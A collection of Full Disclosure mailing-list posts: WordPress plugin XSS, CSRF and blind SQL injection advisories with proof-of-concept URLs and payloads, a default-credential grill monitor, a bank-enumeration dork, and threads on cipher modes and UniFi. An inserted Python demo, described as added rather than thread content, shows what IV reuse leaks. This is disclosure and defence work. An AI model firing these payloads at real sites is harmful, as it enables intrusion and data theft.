Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check

2019-11-29 Thread Tim
What's the issue here exactly? An attacker can just prevent the in-app
update check from realizing it needs to nag the user?

The actual update logic and update-ability is controlled through the Play
Store, no?

-Tim Strazzere


On Tue, Nov 26, 2019 at 10:27 AM David Coomber <
davidcoomber.info...@gmail.com> wrote:

> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below),
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email
> to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email
> to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later
>
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>



[FD] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304]

2019-08-25 Thread tim

[Author:] Tim Tepatti
[Website:] tepatti.com

[Title:] Hard-coded credentials on ProGrade/Lierda Grill Temperature
Monitor [CVE-2019-15304]

[Product:] Grill Temperature Monitor
[Manufacturer:] ProGrade / Lierda
[Affected Version(s):] V1.00_50006
[Tested Version(s):] V1.00_50006
[Vulnerability Type:] Use of hard-coded credentials (CWE ID 798)
[CVE Reference:] CVE-2019-15304


[TL;DR:]

ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default
password of admin for the admin account, which allows an attacker to
cause a Denial of Service or Information Disclosure via the
undocumented access-point configuration page located on the device.

[Long Info:]

ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default
password of admin for the admin account, which allows an attacker to
cause a Denial of Service or Information Disclosure via the
undocumented access-point configuration page located on the device.

The access point configuration page is never made known to the end
user - the user is never supposed to access it or change any of the
options, and as such the end user has no idea that an attacker could
access this page. This is different from a normal access point or
internet router, where the administration page is required for setup
and configuration and the end user is made aware of the risk of
default credentials. This makes the vulnerability more severe because
the attack vector is something the end user wasn't even aware was
operating on their device.

Additionally, there were two vendors provided because Lierda is a
wholesaler who actually created the device, and ProGrade simply
re-branded the device for the American market. This way, both
customers will be aware of the security vulnerabilities in the
product.

[Technical Info:]

[Default Web Server IP:] 11.11.11.254
[Default Web Server Port:] 80

[Reference(s):] http://progradegrill.com/wifi-grilling-thermometer/



[FD] Multiple banks - potential risk of an inconsequent client separation

2019-08-09 Thread Tim Schughart
Hello everyone,

as many of you already know, some German banks share the same hoster.

Via Google dorking it is possible to determine some customers of one of those
hosters (Fiducia & GAD IT AG).

The hoster uses a GET parameter called „bankid“ to identify its customers.

For example:
https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008

With the help of Google dorking („inurl:WebPortal?bankid=“) it is possible to
enumerate all banks which host their online banking service at Fiducia & GAD IT
AG.
We checked this via whois on the IP net ranges - where another mistake is made
- net name „GAD“ in all whois records.

Another indicator for a shared environment (at least some shared systems) is
changing the bank id, as shown in the following example:
https://www.apobank.de/ptlweb/WebPortal?bankid=8008
changed to:
https://www.apobank.de/ptlweb/WebPortal?bankid=8007
redirects to https://www.vr.de/privatkunden.html

In Germany and the EU it is required by law that you separate clients' data,
e.g. because of the EU-DSGVO. For banks especially, BaFin audits this, too.

At the following link you'll find a cleaned list of the dork results, with
doubles removed, where around 85 banks are listed with their bankid.
https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1

In our opinion the separation is not done properly; what do you guys think
about this?


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec GmbH
Robert-Koch-Straße 1-9
56751 Polch 

Website: https://www.prosec-networks.com 
Phone: +49 (0)261 450 930 90

Sitz der Gesellschaft / company domiciled in: Polch
Registergericht / registry court: Amtsgericht Koblenz, HRB 26457
Geschäftsführer / chief executive: Tim Schughart
USt-IdNr./ VAT ID: DE321817516

“This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail.



[FD] YOP Poll 6.0.2 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [YOP Poll](https://wordpress.org/plugins/yop-poll/)
  * Affected Version: 6.0.2
  * Patched Version: 6.0.3
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/26/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The YOP poll WordPress plugin is vulnerable to reflected XSS as it
echoes the poll_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=yop-polls=view-votes_id=1'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/25/2018 Vendor responds, advisory sent
- 11/26/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-yop-poll-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [WP Live Chat Support](https://wordpress.org/plugins/wp-live-chat-support/)
  * Affected Version: 8.0.18
  * Patched Version:
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/31/2018
  * Vendor Fix: 11/01/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS
as it echoes the term parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page='">

# Timeline

- 10/31/2018 Requested email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 11/01/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wp-livechat-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/)
  * Affected Version: 7.10.41
  * Patched Version: 7.10.43
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 10/31/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it
echoes PHP_SELF without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php/'">?page=wp-google-maps-menu=foo

# Timeline

- 10/25/2018 Sent advisory
- 10/25/2018 Vendor confirms and releases fix
- 10/25/2018 Suggested improvement for fix
- 10/31/2018 Vendor releases improved fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] NextScripts: Social Networks Auto-Poster 4.2.7 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [NextScripts: Social Networks Auto-Poster](https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/)
  * Affected Version: 4.2.7
  * Patched Version: 4.2.8
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/02/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Social Networks Auto-Poster WordPress plugin is vulnerable to
reflected XSS as it echoes the `item` parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=nxssnap-reposter=edit=24'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/29/2018 Vendor supplies email address
- 10/31/2018 Advisory sent
- 11/02/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-social-networks-auto-poster-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] KingComposer 2.7.6 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [KingComposer](https://wordpress.org/plugins/kingcomposer/)
  * Affected Version: 2.7.6
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The KingComposer WordPress plugin is vulnerable to reflected XSS as it
echoes the id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper=<%2Fscript>

[FD] Give 2.3.0 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [Give](https://wordpress.org/plugins/give/)
  * Affected Version: 2.3.0
  * Patched Version: 2.3.1
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 11/24/2018
  * Vendor Fix: 12/13/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Give WordPress plugin is vulnerable to reflected XSS as it echoes
various parameters without proper encoding.

# Proof of Concept


http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms=give-tools=import=import_donations=3%5B0%5D=email%5B1%5D=first_name%5B2%5D=amount%5B3%5D=form_id='">

# Timeline

- 11/24/2018 Asked for email address via contact form
- 11/24/2018 Vendor responds, advisory sent
- 12/13/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-give-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] Font_Organizer 2.1.1 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [Font_Organizer](https://wordpress.org/plugins/font-organizer/)
  * Affected Version: 2.1.1
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Font_Organizer WordPress plugin is vulnerable to reflected XSS as it
echoes the manage_font_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/options-general.php?manage_font_id='">=font-setting-admin

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-font-organizer-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] Contact Form Email 7.10.41 - Reflected XSS & CSRF (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS & CSRF
  * Affected Software: [Contact Form Email](https://wordpress.org/plugins/contact-form-to-email/)
  * Affected Version: 1.2.65
  * Patched Version: 1.2.66
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/31/2018
  * Vendor Fix: 10/31/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

## Reflected XSS

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Contact Form Email WordPress plugin is vulnerable to reflected XSS
as it echoes the item parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1='">

# Code

contact-form-to-email/cp_admin_int_edition.inc.php
" />


## CSRF (to XSS)

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The plugin allows the addition of custom JavaScript to forms. Because
the request to place this addition is not protected against CSRF, an
attacker can place arbitrary JavaScript into the application if an
authenticated user visits a webpage containing malicious HTML and/or
JavaScript.

# Proof of Concept


  
http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1=js;
method="POST">
  
  
  
  
  

  



# Timeline

- 10/31/2018 Asked for email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 10/31/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-contact-form-email-xss-csrf/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] Blog2Social 5.0.2 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [Blog2Social](https://wordpress.org/plugins/blog2social/)
  * Affected Version: 5.0.2
  * Patched Version: 5.0.3
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/13/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Blog2Social WordPress plugin is vulnerable to reflected XSS as it
echoes the b2s_update_publish_date parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship=70_action=1_update_publish_date='">

# Timeline

- 10/25/2018 Sent advisory
- 10/26/2018 Vendor confirms receipt of advisory
- 11/13/2018 Vendor releases fix
- 02/05/2019 Confirmed Fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] Quiz And Survey Master 6.0.4 - Reflected XSS (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: XSS
  * Affected Software: [Quiz And Survey Master](https://wordpress.org/plugins/quiz-master-next/)
  * Affected Version: 6.0.4
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Quiz And Survey Master WordPress plugin is vulnerable to reflected
XSS as it echoes the quiz_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results_id='">

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-quiz-and-survey-master-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



[FD] Forminator 1.5.4 - Unauthenticated Persistent XSS, Blind SQL Injection (WordPress Plugin)

2019-02-05 Thread Tim Coen
  * Vulnerability: Unauthenticated Persistent XSS, Blind SQL Injection
  * Affected Software: [Forminator](https://wordpress.org/plugins/forminator/)
  * Affected Version: 1.5.4
  * Patched Version: 1.6
  * CVE: not requested
  * Risk: High
  * Vendor Contacted: 11/25/2018
  * Vendor Fix: 12/10/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

## Unauthenticated Persistent XSS via poll

# CVSS

7.2 High
[CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)

# Details

Custom fields of a poll are not properly encoded when showing results of
a poll, leading to persistent XSS.

# Proof of Concept

Prerequisite: create a poll, add a custom input field, publish the poll.

An attacker can place the payload - for example `'">` - in the custom input field.

To trigger the payload, view the submissions of the poll.


## Authenticated Blind SQL Injection: Delete Submission

# CVSS

8.1 High
[CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H)

# Overview

The action of deleting submissions is vulnerable to blind SQL injection.
An attacker can exploit this to extract data from the database.

An account with the permission to delete submissions is required.

# Proof of Concept

- View submissions, e.g. at
http://192.168.0.103/wordpress/wp-admin/admin.php?page=forminator-entries_type=forminator_forms_id=133
- check the checkbox of one submission, use bulk action -> delete entries
- apply the action and intercept or replay the request
- change the `entry[]` value to contain an SQL payload, e.g.:
1) or sleep(5)--x-


# Timeline

- 11/25/2018 Asked for email address via contact form
- 11/25/2018 Vendor responds, advisory sent
- 12/10/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89



Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

2016-12-30 Thread Tim

Hi Erik,

Thanks for backing me up on a number of things.  Only one response below.


> > In light of that, there's
> > nothing particularly wrong with using CBC, if it is implemented well.
> > At least, using it is not *more* wrong than using OFB, CFB, or CTR
> 
> That is wrong. CBC mode allows attacks such as "Sweet32"
> (https://sweet32.info/), which is not possible with CTR mode.

The site you linked mentions that 64-bit block ciphers are vulnerable, even
in CTR mode.  Obviously the birthday "paradox" applies. Regardless of
how right or wrong you are about Sweet32, this is far from the most
important thing *implementors* should be worried about.  Obviously if
they start with AES, then the birthday paradox issues are vastly
reduced.  Any new system should be avoiding the likes of 3DES,
Blowfish, etc.  So it seems moot.


On the flip side, tell me what the impact is of these two scenarios
where a developer follows *some* of our advice:

(A) They use AES in CBC mode and apply an HMAC to the ciphertext.
They actually validate that HMAC before decrypting.  However, they
fail to use a unique IV for every message.

(B) They use AES in CTR mode and apply an HMAC to the ciphertext.
They actually validate that HMAC before decrypting.  However, they
fail to use a unique IV for every message.


Which is worse?  Obviously (B) fails pretty catastrophically.  (A) is
not great, but at least the plaintext isn't nearly as easy to expose
(usually only minor block-level information leaks).  In the real world
I see these kinds of mistakes all of the time.  So be careful of
steering people toward a mode that doesn't degrade as gracefully when
developers make mistakes.  They invariably will do so, unless they've
spent as much time with crypto as you and I.

tim


PS- And to re-iterate, we shouldn't ask them to use any particular
cipher mode, but instead to use something off the shelf.


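To make scenarios (A) and (B) from the post above concrete, here is an added Python example; it is not code from the thread, from APR or from mod_session_crypto. It builds CBC and CTR over a constructed SHA-256 Feistel permutation standing in for AES (a toy, not a real cipher; only the mode arithmetic matters here), applies encrypt-then-HMAC exactly as both scenarios do, and then shows what a repeated IV leaks. In CTR the keystream is the same for both messages, so the XOR of two ciphertexts equals the XOR of the two plaintexts and one known message exposes the other byte for byte. In CBC a repeated IV only reveals how many leading blocks the two plaintexts have in common. The key, MAC key, IVs and messages are constructed for the demo, and every function name is this example's own.

```python
"""Scenarios (A) and (B): encrypt-then-HMAC with a repeated IV in CBC vs CTR.
The block cipher below is a constructed SHA-256 Feistel network standing in
for AES (toy only, never for real use); the mode behaviour is what matters."""
import hashlib
import hmac

BLOCK = 16

# Constructed demo material: one key and the SAME IV for every message (the mistake)
KEY = b"constructed-key!"          # 16 bytes
MAC_KEY = b"constructed-mac-key"
CTR_IV = bytes(12)                 # 12-byte nonce; a 4-byte block counter is appended
CBC_IV = bytes(16)
MSG1 = b"user=alice;role=" + b"guest;balance=100"   # 16-byte shared prefix
MSG2 = b"user=alice;role=" + b"admin;balance=999"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Feistel round function: keyed hash of one 8-byte half, truncated to 8 bytes
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    """8-round Feistel permutation of a 16-byte block (toy PRP)."""
    left, right = block[:8], block[8:]
    for i in range(8):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(8)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def ctr_encrypt(key, iv, plaintext):
    """CTR: keystream block n = E(iv || n); ciphertext = plaintext XOR keystream."""
    out = bytearray()
    for n in range(0, len(plaintext), BLOCK):
        keystream = block_encrypt(key, iv + (n // BLOCK).to_bytes(4, "big"))
        out += _xor(plaintext[n:n + BLOCK], keystream)
    return bytes(out)


def pad(data):
    """PKCS#7 padding to a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def cbc_encrypt(key, iv, plaintext):
    """CBC: each padded block is XORed with the previous ciphertext block, then E()."""
    padded = pad(plaintext)
    prev, out = iv, bytearray()
    for n in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[n:n + BLOCK], prev))
        out += prev
    return bytes(out)


def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, bytearray()
    for n in range(0, len(ciphertext), BLOCK):
        block = ciphertext[n:n + BLOCK]
        out += _xor(block_decrypt(key, block), prev)
        prev = block
    return bytes(out[:-out[-1]])


def seal(mac_key, iv, ciphertext):
    """Encrypt-then-MAC as both scenarios do: iv || ct || HMAC(iv || ct).
    The tag is checked before decryption, but it says nothing about IV reuse."""
    return iv + ciphertext + hmac.new(mac_key, iv + ciphertext, "sha256").digest()


def ctr_iv_reuse_recovery(ct1, ct2, known_pt1):
    """Scenario (B): the shared keystream cancels, ct1 XOR ct2 == pt1 XOR pt2,
    so knowing pt1 hands over pt2 in full."""
    return _xor(_xor(ct1, ct2), known_pt1)


def cbc_iv_reuse_leak(ct1, ct2):
    """Scenario (A): a repeated IV in CBC reveals only the number of leading
    blocks on which the two plaintexts agree; the remaining blocks stay hidden."""
    shared = 0
    for n in range(0, min(len(ct1), len(ct2)), BLOCK):
        if ct1[n:n + BLOCK] != ct2[n:n + BLOCK]:
            break
        shared += 1
    return shared


if __name__ == "__main__":
    c1, c2 = ctr_encrypt(KEY, CTR_IV, MSG1), ctr_encrypt(KEY, CTR_IV, MSG2)
    print("CTR, reused IV, known MSG1 ->", ctr_iv_reuse_recovery(c1, c2, MSG1))
    b1, b2 = cbc_encrypt(KEY, CBC_IV, MSG1), cbc_encrypt(KEY, CBC_IV, MSG2)
    print("CBC, reused IV -> shared leading blocks:", cbc_iv_reuse_leak(b1, b2))
```

The HMAC plays no part in this leak: both ciphertexts carry valid tags, so the integrity check passes and the confidentiality loss comes purely from the repeated IV. That is the asymmetry the post describes, and it is also the argument for an off-the-shelf construction that chooses the nonce itself, as the PS suggests, rather than relying on the developer to remember it.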

Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

2016-12-27 Thread Tim

>  > res = apr_crypto_passphrase(, , passphrase,
>  > strlen(passphrase), (unsigned char *) (), sizeof(apr_uuid_t),
>  > *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
> 
> CBC. Again.
> 
> The earliest mention of CFB which I know is dated 1989.
> The earliest mention of CTR which I know is dated 1990-ies.
> 
> But there still are people who use CBC...
> 
> Please, PLEASE, PPLAASSSE don't use it. Instead, use either
> Blowfish in CFB mode or at least Rijndael (AES) in CTR (or GCM)
> mode - both are available, for example, in the OpenSSL library.

All traditional modes that lack integrity protection are vulnerable to
chosen-ciphertext attacks in these kinds of scenarios.  CFB isn't
immune and CTR is catastrophically weak.  All traditional modes need a
MAC or similar integrity protection.  In light of that, there's
nothing particularly wrong with using CBC, if it is implemented well.
At least, using it is not *more* wrong than using OFB, CFB, or CTR
without integrity protection.

GCM is fine if the implementation is sound and the IVs never repeat,
but there are pitfalls.  We should instead be pointing developers in
the direction of using something off-the-shelf, such as libsodium.
Much less room for error.

tim



[FD] Ubiquiti

2016-10-19 Thread Tim Schughart
Hi,

please let us communicate directly and not via mailing lists, because this
results in flooding and is not important to all other people. If there is a
final result, whether the PoC has a mistake or not, we can publish the
result.

If other products are affected we don't know - this was not mentioned in
the disclosure (the PoC is only for the OS X software combined with an AP AC
Lite), so we can't give a statement on other products of the vendor.

If nobody is able to get the PoC working, like I said above, maybe we made a
mistake; I will not distance myself from having made a mistake. I think the
vuln should not be seen as too critical.

But what you all approved is that if the database runs locally the following
scenario should be bullet proof:
All devices managed by the management software could be compromised if the PC
gets infected, because the database has absolutely no authentication and you
are able to reset the local admin's web interface password.

This would reduce the CVSSv3 to 6.3 and change the vuln type to „privilege
escalation“, combined with broken authentication even without a "scope
change":
CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Do you agree?

I'm looking forward to minimizing our "race time condition denial of service", to
deliver fast results in future :-P


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K.
Ellingshohl 82
56076 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21621.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21621."









___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Critical Vulnerability in Ubiquiti UniFi

2016-10-03 Thread Tim Schughart
Hi Carlos,

you are correct that mongo is bound to 127.0.0.1 only. But you are able to reach
it remotely if you are using the UniFi Controller software.

So the DB gets tunneled to your device.

Test environment:
1. I have configured the AP for our network.
2. I have removed every piece of software for configuring the AP.
3. I have installed the UniFi Manager (for Mac, 5.2.7).
4. I'm able to connect to the database via 127.0.0.1.

Network topology:
The access point is cabled to an AVM FritzBox. Our test client is connected via
WLAN provided by the FritzBox - so there is no direct connection to the AP.


Best regards
Tim Schughart
 
> Am 01.10.2016 um 15:30 schrieb Carlos Silva <r3...@r3pek.org>:
> 
> Hi Tim!
> 
> I can be missing something here but I just checked this on a freshly installed 
> UniFi Controller and mongod is binding to localhost making this a non-issue. 
> Or, you have to get a remote shell first before you can get a connection to 
> the DB. Am I missing something?
> 
